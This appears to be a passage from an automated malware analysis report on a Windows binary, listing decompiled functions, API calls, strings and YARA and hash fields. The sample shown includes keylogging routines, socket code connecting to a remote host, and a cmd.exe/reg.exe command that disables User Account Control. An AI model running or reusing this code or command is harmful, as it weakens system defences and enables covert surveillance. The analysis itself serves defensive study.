                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                        • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                        • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                        • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410E53, Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 24%
                                        			E00410E53(void* __eflags, char _a4) {
				char _v20;
				char _v36;
				char _v52;
				void* _t16;
				char* _t18;
				void* _t19;
				void* _t36;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
				E00402038(0x41c130);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				E0040209B(0x41c130,  &_a4);
				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));
				_t18 =  &_v20;
				L00414140();
				L00414140();
				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4,  &E0041B310, _t16, 0x41c130);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				E00402118(0x41c130, E00410F04);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t19;
			}










                                        0x00410e65
                                        0x00410e72
                                        0x00410e83
                                        0x00410e84
                                        0x00410e85
                                        0x00410e86
                                        0x00410e87
                                        0x00410e9a
                                        0x00410eac
                                        0x00410eb0
                                        0x00410eba
                                        0x00410ec6
                                        0x00410ed0
                                        0x00410ed9
                                        0x00410ee2
                                        0x00410eef
                                        0x00410ef7
                                        0x00410f03

                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                          • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                          • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310,00000000,?,?,00000000,?), ref: 00410EB0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                          • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                        • String ID:
                                        • API String ID: 2339118965-0
                                        • Opcode ID: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                        • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                        • Opcode Fuzzy Hash: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                        • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412881, Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 43%
                                        			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
				char _v20;
				void* _t15;
				void* _t18;
				signed int _t20;
				void* _t25;
				signed int _t28;
				signed int _t29;
				signed int _t36;
				void* _t46;
				signed int _t57;
				void* _t58;

				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t57 = __eax + 2;
				_t15 = _t57 + _t57;
				L00413E84();
				_t25 = _t15;
				_t28 = _t57;
				_t46 = _t25;
				_t29 = _t28 >> 2;
				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
				_t6 = _t57 - 2; // 0x0
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
				_t58 = _t18;
				_t36 = _t6 >> 2;
				_t20 = memcpy(_t25, _t58, _t36 << 2);
				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
				L00413EBE();
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}














                                        0x0041288d
                                        0x00412896
                                        0x00412897
                                        0x0041289b
                                        0x004128a1
                                        0x004128a3
                                        0x004128a9
                                        0x004128ab
                                        0x004128b5
                                        0x004128ba
                                        0x004128bd
                                        0x004128c3
                                        0x004128cb
                                        0x004128ce
                                        0x004128d9
                                        0x004128df
                                        0x004128e6
                                        0x004128f3
                                        0x004128fc
                                        0x00412909

                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                        • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                        • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                        • String ID:
                                        • API String ID: 391609400-0
                                        • Opcode ID: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                        • Instruction ID: aeeabeca61c13fa181a61ba6e56d16b1543aaa328dd705508f0d2aa2ccd85a4a
                                        • Opcode Fuzzy Hash: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                        • Instruction Fuzzy Hash: A50180326005199B8B08EF68EC958EFB7EAFB88255744443EF907C7390DE709A05CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405D50, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                        • String ID: Offline Keylogger Stopped$[INFO]
                                        • API String ID: 2222684746-1731565019
                                        • Opcode ID: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                        • Instruction ID: e64c4fb295ac971b427419d3758f0b97408fd66a05d8179c7aec1af0dcca75a5
                                        • Opcode Fuzzy Hash: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                        • Instruction Fuzzy Hash: 0C01D674910B046BE7107725C84D7FB7EBCDF81750F44846BE842922C1D7B869458FAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040A0E1, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39processCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E0040A0E1() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t17;

				_t17 = 0x11;
				memset( &_v88, 0, _t17 << 2);
				_v88.cb = 0x44;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}






                                        0x0040a0ed
                                        0x0040a0f1
                                        0x0040a0f6
                                        0x0040a0fd
                                        0x0040a0fe
                                        0x0040a0ff
                                        0x0040a100
                                        0x0040a11f
                                        0x0040a12e
                                        0x0040a138

                                        APIs
                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                        • CloseHandle.KERNEL32(?), ref: 0040A12E
                                        • CloseHandle.KERNEL32(?), ref: 0040A133
                                        Strings
                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                        • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                        • D, xrefs: 0040A0F6
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateProcess
                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                        • API String ID: 2922976086-1747066916
                                        • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                        • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                        • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                        • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412DDF, Relevance: 9.0, APIs: 6, Instructions: 48fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E00412DDF(void _a4, void* _a8) {
				struct _OVERLAPPED* _t13;
				void* _t16;
				long _t17;
				void* _t19;

				_t13 = 0;
				_t19 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t19 != 0xffffffff) {
					_t17 = GetFileSize(_t19, 0);
					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
					_t8 =  &_a4;
					_a4 = 0;
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					if(ReadFile(_t19,  &_a4, _t17, _t8, 0) != 0) {
						_t13 = 1;
					}
					CloseHandle(_t19);
					return _t13;
				}
				return 0;
			}







                                        0x00412de3
                                        0x00412dff
                                        0x00412e04
                                        0x00412e16
                                        0x00412e1a
                                        0x00412e23
                                        0x00412e29
                                        0x00412e2c
                                        0x00412e3d
                                        0x00412e3f
                                        0x00412e3f
                                        0x00412e42
                                        0x00000000
                                        0x00412e48
                                        0x00000000

                                        APIs
                                        • CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E0D
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z.MSVCP60(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E1A
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00000000,?,?,00409C9F,00000000), ref: 00412E2C
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00409C9F,00000000), ref: 00412E34
                                        • CloseHandle.KERNEL32(00000000,?,00409C9F,00000000), ref: 00412E42
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: File$D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@?resize@?$basic_string@CloseCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 2061410294-0
                                        • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                        • Instruction ID: e286a7eceb6258eec42f82ecdc09f82327f8599071822df4e1fbbe5006a6f2d0
                                        • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                        • Instruction Fuzzy Hash: EBF08171241518BFEB125F60EC88FFB7B6CEB867A4F108126FD15D6290CA744E418668
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409D02, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00409D02(void** _a4) {
				void* _t4;
				long _t5;
				struct HRSRC__* _t7;

				_t7 = FindResourceA(0, "SETTINGS", 0xa);
				_t4 = LockResource(LoadResource(0, _t7));
				_t5 = SizeofResource(0, _t7);
				 *_a4 = _t4;
				return _t5;
			}






                                        0x00409d16
                                        0x00409d22
                                        0x00409d2d
                                        0x00409d37
                                        0x00409d3b

                                        APIs
                                        • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                        • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                        • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID: SETTINGS
                                        • API String ID: 3473537107-594951305
                                        • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                        • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                        • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                        • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004126EF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 18threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004126EF(char _a4) {
				void* _t2;
				void* _t3;

				_t1 =  &_a4; // 0x40e322
				_t2 = GetCurrentProcess();
				_t3 = GetCurrentThread();
				return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2);
			}





                                        0x004126ff
                                        0x00412702
                                        0x00412705
                                        0x00412717

                                        APIs
                                        • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                        • GetCurrentThread.KERNEL32 ref: 00412705
                                        • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                        • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Current$Process$DuplicateHandleThread
                                        • String ID: "@
                                        • API String ID: 3566409357-445313631
                                        • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                        • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                        • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                        • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040ACE6, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310,?), ref: 0040AD26
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                          • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                          • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                          • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                          • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                          • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??4?$basic_string@Y?$basic_string@connectfreemallocrecvsocket
                                        • String ID:
                                        • API String ID: 901373779-0
                                        • Opcode ID: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                        • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                        • Opcode Fuzzy Hash: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                        • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405C62, Relevance: 7.5, APIs: 5, Instructions: 42synchronizationCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E00405C62(void* __ecx) {
				long _t7;
				void* _t10;
				void* _t18;
				void* _t19;

				_t18 = __ecx;
				_t7 = CreateEventA(0, 0, 0, 0);
				 *(_t18 + 0x34) = _t7;
				if( *((char*)(_t18 + 0x3d)) != 0) {
					_t10 = _t18 + 0x14;
					do {
						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664);
